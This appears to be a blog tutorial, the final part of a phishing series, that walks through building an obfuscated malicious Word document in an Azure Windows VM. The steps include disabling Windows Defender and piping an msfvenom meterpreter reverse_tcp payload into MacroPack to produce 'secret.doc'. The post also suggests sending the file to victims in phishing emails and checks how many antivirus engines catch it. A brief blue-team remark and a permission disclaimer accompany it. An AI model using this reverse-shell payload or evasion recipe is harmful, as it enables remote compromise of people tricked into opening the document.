Updated: Dec 6, 2022
Hey. Hope you all are doing great. In my previous blog, we analyzed malicious emails to determine how destructive in nature they are. You can read it here. This blog is going to be a bonus one as a follow-up to those three blogs. In this blog, we are going to generate an undetectable payload using a tool called MacroPack utilizing Azure VM.
Reminder: I am using Azure VM, specifically Windows 10 Pro. You can also follow up with this in your Windows VM on either VirtualBox or VMWare.
Creating Resource Group
On the Azure dashboard, we can see many services (you should always explore these portals!) that we can use. But for now, let's click on Resource Groups,
There are no resource groups except the NetworkWatcherRG, which comes by default. NetworkWatcherRG represents the backend service for Network Watcher and is fully managed by Azure. Let's start with creating a new resource group for this purpose,
Here, we need to type out the name of the resource group we want. Click on Review + create,
Reviewing the resource group,
After clicking on Create button, our resource group will be created, and we can see it in our Resource groups panel,
Spin-up Virtual Machine
Back on the dashboard, select Virtual machines,
If you are a new user on Azure, you will see this panel as empty. Or you might have some VMs existing if you are an active user. Let's click on Create, followed by clicking on Azure virtual machine,
In this window, we need to select the resource group we created before, undetectable-payload, enter the name of the virtual machine, Gen-Undetectable-Payload, select the region, (Asia Pacific) Central India (you can select your region), along with selecting the image of the virtual machine we are going to use. I will be using Windows 10 Pro, version 21H2 – Gen1,
We can click on See all images to actually navigate to the available images page and select one for us,
Next, by-default x64 architecture will be selected for this image, set the Administrator account credentials (we'll RDP using these creds), selecting the size, Standard_B2s – 2 vcpus, 4 GiB memory,
We can see all the image sizes by clicking on the See all sizes button and selecting the one which is suitable for us,
Next, this is an important step as we need to check this box for the successful creation of VM,
Then navigate to the Disks tab, and select the Standard SSD (locally-redundant storage),
Clicking on the Review + create button, and finally clicking on the Create button will create a VM. It will take a while to fully provision the instance for us,
We can click on the Go to resource button, and it will take us to the created VM page,
From here, let's go to Connect, and download the RDP file,
RDP into the VM
Execute the download RDP file. Select the Connect in this prompt,
Accept the Certificate by clicking on Yes,
Next, deselect all of these options,
After the machine gets fully booted up, we need to disable the Windows Defender along with disabling the Virus Protection. For that, let's navigate to Settings > Update & Security > Windows Security > Virus & threat protection,
Let's disable all these protections,
Cross-check again to make sure all of these services along with Windows Defender is disabled!
This tool is used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. It also handles various shortcuts formats. This tool can be used for red teaming, pentests, demos, and social engineering assessments. MacroPack will simplify antimalware solutions bypass and automatize the process from vb source to final Office document or other payload type.
Let's download the executable file from Releases,
Furthermore, to generate a .doc extension malicious file, we need to download the MS Office as well, else MacroPack can't be able to generate a malicious .doc document,
Next, we need to download the Metasploit Framework latest version,
We will now install the Metasploit Framework, and after this, we will install the MS Office.
Let's open the Command Prompt as Administrator,
After extracting the downloaded MS Office files, there will appear some files on the desktop. Changing the directory to the Desktop, and dropping into the PowerShell,
Now, we need to execute this command to start the installation process of MS Office,
.\setup.exe /configure .\configuration-Office2021Enterprise.xml
It will get successfully downloaded after a while,
Then, we need to open the MS Office, and we will see this interface,
Here, I have created a dummy account just for this purpose. You can go ahead, and create a dummy account as well. Further, we need to Sign in in MS Office, and we will see this dashboard,
Here, our work is done by setting up the MS Office.
Now, let's copy the macro_pack.exe file on the Desktop, and we are finally ready to generate a malicious document,
Using the command below, we are first creating the VBA payload using MSFVENOM. Then, we will redirect the output of MSFVENOM, which will serve as an input to MacroPack, so that MacroPack will encrypt the VBA payload, making it undetectable,
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G secret.doc
It will take a few seconds to generate the doc file. We just need to open the secret.doc (the file we just created). Click OK,
The document we created will open as an empty file (you can type here anything you want if you wish),
And our sneaky document was created successfully,
Now, to check if this sneaky document is malicious or not, we can obtain its MD5, SHA1, and SHA256 hashes using PowerShell,
Get-FileHash .\secret.doc Get-FileHash -algorithm md5 .\secret.doc Get-FileHash -algorithm sha1 .\secret.doc
and paste them on VirusTotal Search bar. See!! There is no matching hash of this document,
Now, let's determine how destructive in nature this document is by uploading the actual document file,
Out of 63 AVs, 36 show that this document is highly malicious,
Full report - https://www.virustotal.com/gui/file/1837cdae92816f3c52fb4fb5dae5a81e804dabc721819eea010a76a13fe7db35/detection
Points for both red, and blue team:
Red Teamers - Using this method, you can embed this sneaky document in the Phishing Emails to send it to the victim. You can literally have anyone open this document on their system.
Blue Teamers - If you are analyzing an email (or malware, in general), and you can't be able to find the corresponding hash results on VirusTotal or TalosIntelligence, this doesn't mean the attachment/file/document is not malicious. It might be possible that this document has never been analyzed by any AV or a researcher, and that's why we didn't find the matching hash on the VirusTotal earlier.
Well, that's it. I just wanted to show how we can embed the sneaky document in our Phishing Emails. When I learned this method, I was overwhelmed by the process of generating it. Many thanks to my friend @0xAsif for helping me with this process. But, this goes without saying that, "YOU SHOULD NEVER DO THIS WITHOUT PERMISSION". This marks the completion of 4 Part series of Phishing course. Hope you enjoyed it. All right, take care! Until next time.